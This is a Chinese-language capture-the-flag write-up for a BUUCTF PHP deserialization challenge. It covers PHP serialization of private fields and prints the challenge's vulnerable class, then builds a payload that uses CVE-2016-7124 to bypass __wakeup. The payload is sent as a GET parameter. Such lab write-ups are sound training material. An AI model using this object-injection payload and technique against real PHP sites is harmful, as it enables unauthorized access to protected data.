BUUCTF-[极客大挑战 2019]PHP1

Posted 2021-10-16 _Monica_

目录

题目：

知识点：

分析： 

方法：

---

题目：

知识点：

 1. __wakeup() //将在反序列化之后立即调用（当反序列化时变量个数与实际不符是会绕过）我们可以通过一个cve来绕过：CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件：php5 < 5.6.25，PHP7 < 7.0.10，或者PHP 7.3.4
 2. __construct() //当对象被创建即new之前，会触发进行初始化，但在unserialize()时是不会自动调用的。
 3. __destruct() //在到某个对象的所有引用都被删除或者当对象被显式销毁时执行或者当所有的操作正常执行完毕之后，需要释放序列化的对象即在脚本结束时（非unset）php才会销毁引用 一般来说在脚本正常结束运行之前运行。如果抛出异常就不会调用。

protected 声明的字段为保护字段，在所声明的类和该类的子类中可见，但在该类的对象实例中不可见，也就不能输出。因此保护类的变量在序列化时，前面会加上\\0*\\0的前缀。这里的 \\0 表示 ASCII 码为 0 的字符(不可见字符)，而不是 \\0 组合。计算长度时\\0(%00)算做一个字符。url中用%00代替。

private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见，也就不能输出。因此私有类的变量在序列化时，前面都会加上\\0类名\\0的前缀。计算长度时\\0(%00)算做一个字符。url中用%00代替。

public无标记，变量名不变。 s:2:"op";i:2;
protected在变量名前添加标记\\00*\\00。 s:5:"\\00*\\00op";i:2;
private在变量名前添加标记\\00类名\\00。s:17:"\\00类名\\00op";i:2;

PHP——serialize()序列化类变量public、protected、private的区别_东京没有下雨天-CSDN博客

网站的文件放在：www.zip

分析： 

页面没有什么特别的东西，查看源代码也没有发现什么。显示说有网站备份，猜是www.zip，或者直接用dirsearch或者御剑扫瞄

 下载文件，解压打开。

flag.php

 发现不是正确的flag。

index.php

显示包含了class.php文件，并且有一个反序列化点，那应该就是php反序列化的问题了。

 class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

 发现在__destruct()中有个输出$flag变量的代码。那么思路就是序列化修改username的值为admin，传参给select即可。但是我们发现调用__destruct()方法之前会调用__wakeup()方法，修改username的值为guest。那么重点就是绕过这个__wakeup()方法。绕过方法看前面的知识点。

因为当password!=100的时候，会进入if语句，die()结束程序，而无法输出flag，所以需要将password的值修改为100。

方法：

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
    }

    echo serialize(new Name());
?>

输出序列化字符串：

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

这里我们发现Nameusername与前面的14不对应，少了两个字符，而Namepassword也是少了两个字符，这是因为username和password变量是private类型，变量中的类名前后会有空白符，而复制的时候会丢失，所以还需要加上%00，同时要绕过_wakeup()，还要将Name后面的数字修改为大于2的数。

结果：

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

get传参： 

?select=O:4:"Name":4:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}